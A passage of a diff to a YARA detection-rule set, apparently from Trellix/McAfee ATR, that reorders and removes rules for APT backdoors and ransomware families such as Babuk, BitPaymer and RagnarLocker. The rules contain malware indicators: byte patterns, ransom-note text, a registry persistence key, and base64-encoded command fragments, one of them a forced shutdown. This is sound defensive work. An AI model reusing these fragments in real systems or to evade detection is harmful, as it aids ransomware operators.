((1 of ($a*) and 4 of ($b*)) or (1 of ($a*) and 1 of ($c*)) or 2 of ($a*) or all of ($b*)) + uint16(0)==0x5a4d and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "/C=KR/ST=Seoul/L=Gangnam-gu/O=LivePlex Corp/CN=LivePlex Corp" and pe.signatures[i].serial=="3f:55:42:e2:e7:1d:8d:b3:57:04:1c:9d:d4:5b:95:0a" or pe.signatures[i].subject contains "/C=KR/ST=Seoul/L=Gangnam-gu/O=LivePlex Corp/CN=LivePlex Corp" and pe.signatures[i].serial=="3f:55:42:e2:e7:1d:8d:b3:57:04:1c:9d:d4:5b:95:0a" or pe.signatures[i].subject contains "/C=KR/ST=Seoul/L=Gangnam-gu/O=LivePlex Corp/CN=LivePlex Corp" or pe.signatures[i].serial=="3f:55:42:e2:e7:1d:8d:b3:57:04:1c:9d:d4:5b:95:0a") } -rule TRELLIX_ARC_Apt_Turla_Pdb : BACKDOOR FILE +rule TRELLIX_ARC_Ixeshe_Bled_Malware_Pdb : BACKDOOR FILE { meta: - description = "Rule to detect a component of the APT Turla" + description = "Rule to detect Ixeshe_bled malware based on PDB" author = "Marc Rivero | McAfee ATR Team" - id = "b39ac7fc-16dd-559e-8ab0-76da5cbbc719" - date = "2017-05-31" + id = "93356eab-5bb3-5b85-acc6-9a247554aa2d" + date = "2012-05-30" modified = "2020-08-14" - reference = "https://attack.mitre.org/groups/G0010/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_turla_pdb.yar#L1-L25" + reference = "https://attack.mitre.org/software/S0015/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/ixeshe_bled_pdb.yar#L1-L24" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "3b8bd0a0c6069f2d27d759340721b78fd289f92e0a13965262fea4e8907af122" - logic_hash = "d519317c936a38f189bf0de908902ec4e3e079c8c7463c8881ceb332c0a82a26" + hash = "d1be51ef9a873de85fb566d157b034234377a4a1f24dfaf670e6b94b29f35482" + logic_hash = "7d2ce7644e25a56c101c148a32f7b0f7c3185c0c17f4d65eaef257f6ac7f8ffb" score = 75 quality = 70 tags = "BACKDOOR, FILE" rule_version = "v1" malware_type = "backdoor" - malware_family = "Backdoor:W32/Turla" + malware_family = "Backdoor:W32/Ixeshe" actor_type = "Apt" actor_group = "Unknown" strings: - $pdb = "\\Workshop\\Projects\\cobra\\carbon_system\\x64\\Release\\carbon_system.pdb" + $pdb = "\\code\\Blade2009.6.30\\Blade2009.6.30\\EdgeEXE_20003OC\\Debug\\EdgeEXE.pdb" condition: - uint16(0)==0x5a4d and filesize <650KB and any of them + uint16(0)==0x5a4d and filesize <200KB and any of them } rule TRELLIX_ARC_Apt_Hanover_Pdb : BACKDOOR FILE { @@ -190633,2730 +193287,1976 @@ rule TRELLIX_ARC_Apt_Hanover_Slidewin_Pdb : BACKDOOR FILE condition: uint16(0)==0x5a4d and filesize <100KB and any of them } -rule TRELLIX_ARC_Apt_Mirage_Pdb : TROJAN FILE +rule TRELLIX_ARC_Enfal_Pdb : BACKDOOR FILE { meta: - description = "Rule to detect Mirage samples based on PDB" + description = "Rule to detect Enfal malware" author = "Marc Rivero | McAfee ATR Team" - id = "49b7623f-a2c9-52e4-8679-d62f6aae99ca" - date = "2012-09-18" + id = "09b9667c-cf58-5438-958d-19a99fe91e32" + date = "2013-08-27" modified = "2020-08-14" - reference = "https://www.secureworks.com/research/the-mirage-campaign" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_mirage_pdb.yar#L1-L26" + reference = "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/enfal" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/enfal_pdb.yar#L1-L29" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "0107a12f05bea4040a467dd5bc5bd130fd8a4206a09135d452875da89f121019" - logic_hash = "cb88dc787d9964451ea93f5574d9c73ae6a820d81e20d41c3c8ee44c3fee032d" + hash = "6756808313359cbd7c50cd779f809bc9e2d83c08da90dbd80f5157936673d0bf" + logic_hash = "1f7785a4c54981c3e7cb417718312e0ed82132b9bd9288f7b0f322cbeafbaecd" score = 75 quality = 70 - tags = "TROJAN, FILE" + tags = "BACKDOOR, FILE" rule_version = "v1" - malware_type = "trojan" - malware_family = "Trojan:W32/Mirage" + malware_type = "backdoor" + malware_family = "Backdoor:W32/Enfal" actor_type = "Apt" actor_group = "Unknown" strings: - $pdb = "\\MF-v1.2\\Server\\Debug\\Server.pdb" - $pdb1 = "\\fox_1.2 20110307\\MF-v1.2\\Server\\Release\\MirageFox_Server.pdb" + $pdb = "\\Documents and Settings\\Administrator\\My Documents\\Work\\EtenFalcon\\Release\\DllServiceTrojan.pdb" + $pdb1 = "\\Documents and Settings\\Administrator\\My Documents\\Work\\EtenFalcon\\Release\\ServiceDll.pdb" + $pdb2 = "\\Release\\ServiceDll.pdb" + $pdb3 = "\\muma\\0511\\Release\\ServiceDll.pdb" + $pdb4 = "\\programs\\LuridDownLoader\\LuridDownloader for Falcon\\ServiceDll\\Release\\ServiceDll.pdb" condition: uint16(0)==0x5a4d and filesize <150KB and any of them } -rule TRELLIX_ARC_Ixeshe_Bled_Malware_Pdb : BACKDOOR FILE +rule TRELLIX_ARC_Karkoff_Dnspionaje : BACKDOOR FILE { meta: - description = "Rule to detect Ixeshe_bled malware based on PDB" + description = "Rule to detect the Karkoff malware" author = "Marc Rivero | McAfee ATR Team" - id = "93356eab-5bb3-5b85-acc6-9a247554aa2d" - date = "2012-05-30" + id = "a5cdc65f-3a4c-5d97-9d88-8d60b14dfb9a" + date = "2019-04-23" modified = "2020-08-14" - reference = "https://attack.mitre.org/software/S0015/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/ixeshe_bled_pdb.yar#L1-L24" + reference = "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_karkoff_dnspionaje.yar#L1-L30" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "d1be51ef9a873de85fb566d157b034234377a4a1f24dfaf670e6b94b29f35482" - logic_hash = "7d2ce7644e25a56c101c148a32f7b0f7c3185c0c17f4d65eaef257f6ac7f8ffb" + hash = "5b102bf4d997688268bab45336cead7cdf188eb0d6355764e53b4f62e1cdf30c" + logic_hash = "79dd0087f1197cb1b2cd98416302363951479ba5ebf82289768585b56ed21c3a" score = 75 quality = 70 tags = "BACKDOOR, FILE" rule_version = "v1" malware_type = "backdoor" - malware_family = "Backdoor:W32/Ixeshe" + malware_family = "Backdoor:W32/Karkoff" actor_type = "Apt" actor_group = "Unknown" strings: - $pdb = "\\code\\Blade2009.6.30\\Blade2009.6.30\\EdgeEXE_20003OC\\Debug\\EdgeEXE.pdb" - - condition: - uint16(0)==0x5a4d and filesize <200KB and any of them -} -rule TRELLIX_ARC_Wannaren_Ransomware : RANSOMWARE FILE -{ - meta: - description = "Rule to detect WannaRen Ransomware" - author = "McAfee ATR Team" - id = "f4f30d12-547d-5044-a4e5-b88bf359480f" - date = "2020-04-25" - modified = "2020-10-12" - reference = "https://blog.360totalsecurity.com/en/attention-you-may-have-become-a-susceptible-group-of-wannaren-ransomware/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_wannaren.yar#L1-L34" - license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "7b364f1c854e6891c8d09766bcc9a49420e0b5b4084d74aa331ae94e2cfb7e1d" - logic_hash = "0feb913b84eb0ecdda688f0cf0a5051798fe4fbce8a6ea959825985a81a6699c" - score = 75 - quality = 70 - tags = "RANSOMWARE, FILE" - rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransom:W32/WannaRen" - actor_type = "Cybercrime" - actor_group = "Unknown" - - strings: - $sq0 = { 92 93 a91c2ea521 59 334826 } - $sq1 = { d0ce 6641 c1e9c0 41 80f652 49 c1f94d } - $sq2 = { 80f8b5 4d 63c9 f9 4d 03d9 41 } - $sq3 = { 34b7 d2ea 660fbafa56 0f99c2 32d8 660fbafaed 99 } - $sq4 = { f9 f7c70012355f 35c01f5226 f9 8d8056c800b0 f6c4b2 f9 } - $sq5 = { f5 f9 44 3aeb 45 33cd 41 } - $sq6 = { 890f c0ff12 44 b4a3 ee 2b4e70 7361 } - $sq7 = { 81c502000000 6689542500 6681d97a1e 660fabe1 660fbae1a5 8b0f 8dbf04000000 } - $sq8 = { 8d13 de11 d7 677846 f1 0d8cd45f87 bb34b98f33 } - $sq9 = { 1440 4b 41 e8???????? 397c0847 } - - condition: - uint16(0)==0x5a4d and filesize <21000KB and 7 of them -} -rule TRELLIX_ARC_Bitpaymer_Ransomware : RANSOMWARE FILE -{ - meta: - description = "Rule to detect BitPaymer Ransomware" - author = "Marc Rivero | McAfee ATR Team" - id = "20b91cf2-2a84-55d9-8230-90d7b20a461f" - date = "2019-11-08" - modified = "2020-08-14" - reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/spanish-mssp-targeted-by-bitpaymer-ransomware/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Bitpaymer.yar#L1-L72" - license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "527cdbdf51e6f3f5d58e805cf4a1bc09c9d24880c2323046acef6ee03c92d62f" - score = 75 - quality = 66 - tags = "RANSOMWARE, FILE" - rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransom:W32/BitPaymer" - actor_type = "Cybercrime" - actor_group = "Unknown" - - strings: - $s1 = "IEncrypt.dll" fullword wide - $op0 = { e8 5f f3 ff ff ff b6 e0 } - $op1 = { e8 ad e3 ff ff 59 59 8b 75 08 8d 34 f5 38 eb 42 } - $op2 = { e9 45 ff ff ff 33 ff 8b 75 0c 6a 04 e8 c1 d1 ff } - $pdb = "S:\\Work\\_bin\\Release-Win32\\wp_encrypt.pdb" fullword ascii - $oj0 = { 39 74 24 34 75 53 8d 4c 24 18 e8 b8 d1 ff ff ba } - $oj1 = { 5f 8b c6 5e c2 08 00 56 8b f1 8d 4e 34 e8 91 af } - $oj2 = { 8b cb 8d bd 50 ff ff ff 8b c1 89 5f 04 99 83 c1 } - $t1 = ".C:\\aaa_TouchMeNot_.txt" fullword wide - $ok0 = { e8 b5 34 00 00 ff 74 24 18 8d 4c 24 54 e8 80 39 } - $ok1 = { 8b 5d 04 33 ff 8b 44 24 34 89 44 24 5c 85 db 7e } - $ok2 = { 55 55 ff 74 24 20 8d 4c 24 34 e8 31 bf 00 00 55 } - $random = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+" fullword ascii - $oi0 = { a1 04 30 ac 00 8b ce 0f af c2 03 c0 99 8b e8 89 } - $oi1 = { e8 64 a2 ff ff 85 c0 74 0c 8d 4d d8 51 ff 35 64 } - $oi2 = { c7 03 d4 21 ac 00 e8 86 53 00 00 89 73 10 89 7b } - $ou0 = { e8 64 a2 ff ff 85 c0 74 0c 8d 4d d8 51 ff 35 60 } - $ou1 = { a1 04 30 04 00 8b ce 0f af c2 03 c0 99 8b e8 89 } - $ou2 = { 8d 4c 24 10 e8 a0 da ff ff 68 d0 21 04 00 8d 4c } - $oa1 = { 56 52 ba 00 10 0c 00 8b f1 e8 28 63 00 00 8b c6 } - $oa2 = { 81 3d 50 30 0c 00 53 c6 d2 43 56 8b f1 75 23 ba } - $oy0 = { c7 06 cc 21 a6 00 c7 46 08 } - $oy1 = { c7 06 cc 21 a6 00 c7 46 08 } - $oy2 = { c7 06 cc 21 a6 00 c7 46 08 } - $oh1 = { e8 74 37 00 00 a3 00 30 fe 00 8d 4c 24 1c 8d 84 } - $oh2 = { 56 52 ba 00 10 fe 00 8b f1 e8 28 63 00 00 8b c6 } - - condition: - ( uint16(0)==0x5a4d and filesize <1000KB) and ($s1 and all of ($op*)) or ($pdb and all of ($oj*)) or ($t1 and all of ($ok*)) or ($random and all of ($oi*)) or ($random and all of ($ou*)) or ($random and all of ($oa*) and $ou0) or ($random and all of ($oy*)) or ($random and all of ($oh*)) or ($random and $ou0) or ($random and $oi1) -} -rule TRELLIX_ARC_RANSOM_Babuk_Packed_Feb2021 : RANSOM T1027_005 T1027 T1083 T1082 T1059 T1129 FILE -{ - meta: - description = "Rule to detect Babuk Locker packed" - author = "McAfee ATR" - id = "f5f3a3a6-2531-56c4-9153-b698c7bdc3d3" - date = "2021-02-19" - modified = "2021-02-24" - reference = "https://github.com/advanced-threat-research/Yara-Rules/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Babuk_Packed_Feb2021.yar#L1-L30" - license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "48e0f7d87fe74a2b61c74f0d32e6a8a5" - logic_hash = "f3312b9c9147e9f892dbfb329cb95d3ee3ae67eefeec2d089b8c89fd26531953" - score = 75 - quality = 70 - tags = "RANSOM, T1027.005, T1027, T1083, T1082, T1059, T1129, FILE" - rule_version = "v1" - malware_family = "Ransom:Win/Babuk" - malware_type = "Ransom" - mitre_attack = "T1027.005, T1027, T1083, T1082, T1059, T1129" - - strings: - $first_stage1 = { 81 ec 30 04 00 00 68 6c 49 43 00 ff 15 74 20 43 00 a3 60 4e f8 02 b8 db d9 2b 00 ba c5 62 8e 76 b9 35 11 5f 39 eb 09 8d a4 24 00 00 00 00 8b ff 89 14 24 89 4c 24 04 81 04 24 25 10 a3 3b 81 04 24 cf e0 fb 07 81 04 24 35 26 9f 42 81 04 24 65 2b 39 06 81 04 24 3c 37 33 5b 81 44 24 04 48 4f c2 5d 83 e8 01 c7 05 54 4e f8 02 00 00 00 00 75 bf 8b 0d 54 aa 43 00 53 8b 1d 58 20 43 00 55 8b 2d 60 20 43 00 56 81 c1 01 24 0a 00 57 8b 3d 50 20 43 00 89 0d 64 4e f8 02 33 f6 eb 03 8d 49 00 81 f9 fc 00 00 00 75 08 6a 00 ff 15 40 20 43 00 6a 00 ff d7 8b 0d 64 4e f8 02 81 f9 7c 0e 00 00 75 19 6a 00 ff d3 6a 00 6a 00 8d 44 24 48 50 6a 00 6a 00 ff d5 8b 0d 64 4e f8 02 81 fe e5 84 c1 09 7e 0a 81 7c 24 2c 0f 11 00 00 75 12 46 8b c6 99 83 fa 14 7c aa 7f 07 3d 30 c1 cf c7 72 a1 51 6a 00 ff 15 2c 20 43 00 8b 0d 08 a4 43 00 33 f6 a3 f4 31 f8 02 89 0d f4 07 fb 02 39 35 64 4e f8 02 76 10 8b c6 e8 56 e4 ff ff 46 3b 35 64 4e f8 02 72 f0 8b 35 80 20 43 00 bf f0 72 e9 00 8b ff 81 3d 64 4e f8 02 4d 09 00 00 75 04 6a 00 ff d6 83 ef 01 75 eb e8 d6 e3 ff ff e8 11 fe ff ff e8 0c e4 ff ff 5f 5e 5d 33 c0 5b 81 c4 30 04 00 00 c3 } - $first_stage2 = {81ec3??4????68????????ff??????????a3????????b8????????ba????????b9????????eb??891424894c240481????????????81????????????81????????????81????????????81????????????81??????????????83e801c7??????????????????75??8b??????????538b??????????558b??????????5681??????????578b??????????89??????????33f6eb??81??????????75??6a??ff??????????6a??ffd78b??????????81??????????75??6a??ffd36a??6a??8d442448506a??6a??ffd58b??????????81??????????7e??817c242c0f11????75??468bc69983????7c??7f??3d????????72??516a??ff??????????8b??????????33f6a3????????89??????????39??????????76??8bc6e8????????463b??????????72??8b??????????bf????????8bff81??????????????????75??6a??ffd683ef0175??e8????????e8????????e8????????5f5e5d33c05b81c43??4????c3} - $first_stage3 = {81ec3??4????68????????ff??????????a3????????b8????????ba????????b9????????[2-6]891424894c240481????????????81????????????81????????????81????????????81????????????81??????????????83e801c7??????????????????[2-6]8b??????????538b??????????558b??????????5681??????????578b??????????89??????????33f6[2-6]81??????????[2-6]6a??ff??????????6a??ffd78b??????????81??????????[2-6]6a??ffd36a??6a??8d442448506a??6a??ffd58b??????????81??????????[2-6]817c242c0f11????[2-6]468bc69983????[2-6][2-6]3d????????[2-6]516a??ff??????????8b??????????33f6a3????????89??????????39??????????[2-6]8bc6e8????????463b??????????[2-6]8b??????????bf????????8bff81??????????????????[2-6]6a??ffd683ef01[2-6]e8????????e8????????e8????????5f5e5d33c05b81c43??4????c3} - $first_stage4 = { 81 EC 30 04 00 00 68 6C 49 43 00 FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? B8 DB D9 2B 00 BA C5 62 8E 76 B9 35 11 5F 39 EB ?? 8D A4 24 ?? ?? ?? ?? 8B FF 89 14 24 89 4C 24 ?? 81 04 24 25 10 A3 3B 81 04 24 CF E0 FB 07 81 04 24 35 26 9F 42 81 04 24 65 2B 39 06 81 04 24 3C 37 33 5B 81 44 24 ?? 48 4F C2 5D 83 E8 01 C7 05 ?? ?? ?? ?? 00 00 00 00 75 ?? 8B 0D ?? ?? ?? ?? 53 8B 1D ?? ?? ?? ?? 55 8B 2D ?? ?? ?? ?? 56 81 C1 01 24 0A 00 57 8B 3D ?? ?? ?? ?? 89 0D ?? ?? ?? ?? 33 F6 EB ?? 8D 49 ?? 81 F9 FC 00 00 00 75 ?? 6A 00 FF 15 ?? ?? ?? ?? 6A 00 FF D7 8B 0D ?? ?? ?? ?? 81 F9 7C 0E 00 00 75 ?? 6A 00 FF D3 6A 00 6A 00 8D 44 24 ?? 50 6A 00 6A 00 FF D5 8B 0D ?? ?? ?? ?? 81 FE E5 84 C1 09 7E ?? 81 7C 24 ?? 0F 11 00 00 75 ?? 46 8B C6 99 83 FA 14 7C ?? 7F ?? 3D 30 C1 CF C7 72 ?? 51 6A 00 FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 33 F6 A3 ?? ?? ?? ?? 89 0D ?? ?? ?? ?? 39 35 ?? ?? ?? ?? 76 ?? 8B C6 E8 ?? ?? ?? ?? 46 3B 35 ?? ?? ?? ?? 72 ?? 8B 35 ?? ?? ?? ?? BF F0 72 E9 00 8B FF 81 3D ?? ?? ?? ?? 4D 09 00 00 75 ?? 6A 00 FF D6 83 EF 01 75 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 5F 5E 5D 33 C0 5B 81 C4 30 04 00 00 C3} - $files_encryption1 = { 8a 46 02 c1 e9 02 88 47 02 83 ee 02 83 ef 02 83 f9 08 72 88 fd f3 a5 fc ff 24 95 20 81 40 00 } - $files_encryption2 = {8a4602c1e90288470283ee0283ef0283????72??fdf3a5fcff????????????} - $files_encryption3 = { 8A 46 ?? C1 E9 02 88 47 ?? 83 EE 02 83 EF 02 83 F9 08 72 ?? FD F3 A5 FC FF 24 95 ?? ?? ?? ??} - - condition: - filesize <=300KB and any of ($first_stage*) and any of ($files_encryption*) -} -rule TRELLIX_ARC_Screenlocker_Acroware : RANSOMWARE FILE -{ - meta: - description = "Rule to detect the ScreenLocker Acroware" - author = "Marc Rivero | McAfee ATR Team" - id = "76eb69eb-dfe7-5629-bf2d-d20574efd662" - date = "2018-08-28" - modified = "2020-08-14" - reference = "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_acroware.yar#L1-L29" - license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "f9efcfc5328e6502cbbbff752a940ac221e437d8732052fc265618f6a6ad72ae" - logic_hash = "582f3544cf1f8066b1e9ac04c3a4cc9f0ba96804ca53bc3746b433df9c33e0a1" - score = 75 - quality = 70 - tags = "RANSOMWARE, FILE" - rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransom:W32/Acroware" - actor_type = "Cybercrime" - actor_group = "Unknown" - - strings: - $s1 = "C:\\Users\\patri\\Documents\\Visual Studio 2015\\Projects\\Advanced Ransi\\Advanced Ransi\\obj\\Debug\\Advanced Ransi.pdb" fullword ascii - $s2 = "All your Personal Data got encrypted and the decryption key is stored on a hidden" fullword ascii - $s3 = "alphaoil@mail2tor.com any try of removing this Ransomware will result in an instantly " fullword ascii - $s4 = "HKEY_CURRENT_USER\\SoftwareE\\Microsoft\\Windows\\CurrentVersion\\Run" fullword wide - $s5 = "webserver, after 72 hours thedecryption key will get removed and your personal" fullword ascii - - condition: - ( uint16(0)==0x5a4d and filesize <2000KB) and all of them -} -rule TRELLIX_ARC_Amba_Ransomware : RANSOMWARE FILE -{ - meta: - description = "Rule to detect Amba Ransomware" - author = "Marc Rivero | McAfee ATR Team" - id = "961f2892-e462-55e4-bd96-7dff895cb1e6" - date = "2017-07-03" - modified = "2020-08-14" - reference = "https://www.enigmasoftware.com/ambaransomware-removal/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_amba.yar#L1-L41" - license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "b9b6045a45dd22fcaf2fc13d39eba46180d489cb4eb152c87568c2404aecac2f" - logic_hash = "0830ab49956711d3e6ad64785edcf54146a24756c4ab66384305dc18091867bd" - score = 75 - quality = 68 - tags = "RANSOMWARE, FILE" - rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransom:W32/Amba" - actor_type = "Cybercrime" - actor_group = "Unknown" - - strings: - $s1 = "64DCRYPT.SYS" fullword wide - $s2 = "32DCRYPT.SYS" fullword wide - $s3 = "64DCINST.EXE" fullword wide - $s4 = "32DCINST.EXE" fullword wide - $s5 = "32DCCON.EXE" fullword wide - $s6 = "64DCCON.EXE" fullword wide - $s8 = "32DCAPI.DLL" fullword wide - $s9 = "64DCAPI.DLL" fullword wide - $s10 = "ICYgc2h1dGRvd24gL2YgL3IgL3QgMA==" fullword ascii - $s11 = "QzpcVXNlcnNcQUJDRFxuZXRwYXNzLnR4dA==" fullword ascii - $s12 = ")!pssx}v!pssx}v))!pssx}v!pssx}v))!pssx}v!pssx}v))!pssx}v!pssx}v))!pssx}v!pssx}v))!pssx}v!pssx}v))!pssx}v!pssx}v)" fullword ascii - $s13 = "RGVmcmFnbWVudFNlcnZpY2U=" - $s14 = "LWVuY3J5cHQgcHQ5IC1wIA==" - $s15 = "LWVuY3J5cHQgcHQ3IC1wIA==" - $s16 = "LWVuY3J5cHQgcHQ2IC1wIA==" - $s17 = "LWVuY3J5cHQgcHQzIC1wIA==" - - condition: - ( uint16(0)==0x5a4d and filesize <3000KB and (8 of them )) or ( all of them ) -} -rule TRELLIX_ARC_Snake_Ransomware : RANSOMWARE FILE -{ - meta: - description = "Rule to detect Snake ransomware" - author = "McAfee ATR Team" - id = "b8f50af5-5568-5676-93a1-e818f08df0ce" - date = "2020-02-20" - modified = "2020-10-12" - reference = "https://dragos.com/blog/industry-news/ekans-ransomware-and-ics-operations/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_snake_ransomware.yar#L1-L26" - license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "e5262db186c97bbe533f0a674b08ecdafa3798ea7bc17c705df526419c168b60" - logic_hash = "3ae64fbacbf886b8d09abc3f5f8eb9c8bff809909a251f2d055056e6d12217a2" - score = 75 - quality = 70 - tags = "RANSOMWARE, FILE" - rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransom:W32/EKANS" - actor_type = "Cybercrime" - actor_group = "Unknown" - - strings: - $snake = { 43 3A 2F 55 73 ?? 72 ?? 2F 57 49 4E 31 2F 67 6F 2F 73 ?? 63 2F 6A 6F 62 6E 68 62 67 6E 6E 69 66 70 6F 64 68 68 70 ?? 6D 66 2F 6E 66 64 6C 68 6F 70 68 6B 65 69 6A 61 64 67 66 64 64 69 6D 2F 6E 66 64 6C 68 6F 70 68 6B 65 69 6A 61 64 67 66 64 64 69 6D 2F 76 74 5F 73 74 ?? 69 6E 67 2E 67 6F 00 } - - condition: - ( uint16(0)==0x5a4d and filesize <11000KB) and all of them -} -import "pe" - -rule TRELLIX_ARC_Ragnarlocker_Ransomware : RANSOMWARE FILE -{ - meta: - description = "Rule to detect RagnarLocker samples" - author = "McAfee ATR Team" - id = "58874f27-3070-52c9-bd96-337fdaa4499b" - date = "2020-04-15" - modified = "2020-10-12" - reference = "https://www.bleepingcomputer.com/news/security/ragnar-locker-ransomware-targets-msp-enterprise-support-tools/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_ragnarlocker.yar#L3-L45" - license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "9706a97ffa43a0258571def8912dc2b8bf1ee207676052ad1b9c16ca9953fc2c" - logic_hash = "2f31da9182a1b47fb1e7e4459461de4c496ec323ff13e622d3ce27ac8cce1912" - score = 75 - quality = 68 - tags = "RANSOMWARE, FILE" - rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransom:W32/RagnarLocker" - actor_type = "Cybercrime" - actor_group = "Unknown" - - strings: - $s1 = {2D 2D 2D 52 41 47 4E 41 52 20 53 45 43 52 45 54 2D 2D 2D} - $s2 = { 66 ?? ?? ?? ?? ?? ?? 66 ?? ?? ?? B8 ?? ?? ?? ?? 0F 44 } - $s3 = { 5? 8B ?? 5? 5? 8B ?? ?? 8B ?? 85 ?? 0F 84 } - $s4 = { FF 1? ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 85 } - $s5 = { 8D ?? ?? ?? ?? ?? 5? FF 7? ?? E8 ?? ?? ?? ?? 85 ?? 0F 85 } - $op1 = { 0f 11 85 70 ff ff ff 8b b5 74 ff ff ff 0f 10 41 } - $p0 = { 72 eb fe ff 55 8b ec 81 ec 00 01 00 00 53 56 57 } - $p1 = { 60 be 00 00 41 00 8d be 00 10 ff ff 57 eb 0b 90 } - $bp0 = { e8 b7 d2 ff ff ff b6 84 } - $bp1 = { c7 85 7c ff ff ff 24 d2 00 00 8b 8d 7c ff ff ff } - $bp2 = { 8d 85 7c ff ff ff 89 85 64 ff ff ff 8d 4d 84 89 } - - condition: - uint16(0)==0x5a4d and filesize <100KB and (4 of ($s*) and $op1) or all of ($p*) and pe.imphash()=="9f611945f0fe0109fe728f39aad47024" or all of ($bp*) and pe.imphash()=="489a2424d7a14a26bfcfb006de3cd226" -} -rule TRELLIX_ARC_Lockergogaransomware : RANSOMWARE FILE -{ - meta: - description = "LockerGoga Ransomware" - author = "Christiaan Beek - McAfee ATR team" - id = "bdf5da34-adf0-5731-820f-96511e647a83" - date = "2019-03-20" - modified = "2020-08-14" - reference = "https://github.com/advanced-threat-research/Yara-Rules/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_LockerGoga.yar#L1-L36" - license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "ba15c27f26265f4b063b65654e9d7c248d0d651919fafb68cb4765d1e057f93f" - logic_hash = "165fa0fa044b2e0d2344626c2064162f23e13dc17310a772b703dbbe9457bd99" - score = 75 - quality = 70 - tags = "RANSOMWARE, FILE" - rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransom:W32/LockerGoga" - actor_type = "Cybercrime" - actor_group = "Unknown" - - strings: - $1 = "boost::interprocess::spin_recursive_mutex recursive lock overflow" fullword ascii - $2 = ".?AU?$error_info_injector@Usync_queue_is_closed@concurrent@boost@@@exception_detail@boost@@" fullword ascii - $3 = ".?AV?$CipherModeFinalTemplate_CipherHolder@V?$BlockCipherFinal@$00VDec@RC6@CryptoPP@@@CryptoPP@@VCBC_Decryption@2@@CryptoPP@@" fullword ascii - $4 = "?http://crl.usertrust.com/USERTrustRSACertificationAuthority.crl0v" fullword ascii - $5 = "cipher.exe" fullword ascii - $6 = ".?AU?$placement_destroy@Utrace_queue@@@ipcdetail@interprocess@boost@@" fullword ascii - $7 = "3http://crt.usertrust.com/USERTrustRSAAddTrustCA.crt0%" fullword ascii - $8 = "CreateProcess failed" fullword ascii - $9 = "boost::dll::shared_library::load() failed" fullword ascii - $op1 = { 8b df 83 cb 0f 81 fb ff ff ff 7f 76 07 bb ff ff } - $op2 = { 8b df 83 cb 0f 81 fb ff ff ff 7f 